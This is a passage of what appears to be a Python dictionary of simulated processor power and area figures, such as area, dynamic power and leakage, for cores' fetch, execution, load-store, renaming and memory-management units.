'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00116095,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000484327,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0011372,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00481743,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00979723,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0761029,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.84079,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.191831,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.25848,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.29424,
'Instruction Fetch Unit/Runtime Dynamic': 0.541028,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00652957,
'L2/Runtime Dynamic': 0.00197975,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.07704,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.405711,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0271736,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0271736,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.20536,
'Load Store Unit/Runtime Dynamic': 0.566895,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0670054,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.134011,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0237804,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.023878,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.300983,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0314488,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.497942,
'Memory Management Unit/Runtime Dynamic': 0.0553268,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.0529,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.353115,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0158113,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.122071,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.490997,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.95639,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.140137,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.312759,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.710538,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.255198,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.411625,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.207775,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.874599,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.182937,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.45936,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.134236,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0107042,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.13175,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0791639,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.265986,
'Execution Unit/Register Files/Runtime Dynamic': 0.089868,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.312602,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.617547,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.30015,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00125961,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00125961,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00116094,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00048432,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0011372,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00481736,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00979706,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0761022,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.84076,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.191828,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.258477,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.2942,
'Instruction Fetch Unit/Runtime Dynamic': 0.541022,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00652957,
'L2/Runtime Dynamic': 0.00198512,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.07703,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.405709,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0271731,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.027173,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.20535,
'Load Store Unit/Runtime Dynamic': 0.56689,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0670041,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.134008,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.02378,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0238775,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.30098,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0314484,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.497939,
'Memory Management Unit/Runtime Dynamic': 0.055326,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.0528,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.353114,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0158112,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.12207,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.490994,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.95637,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.140124,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.312748,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.710444,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.255125,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.411508,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.207715,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.874348,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.182869,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.45908,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.134218,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0107011,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.131724,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0791412,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.265942,
'Execution Unit/Register Files/Runtime Dynamic': 0.0898423,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.312544,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.617394,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.29971,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00125902,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00125902,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
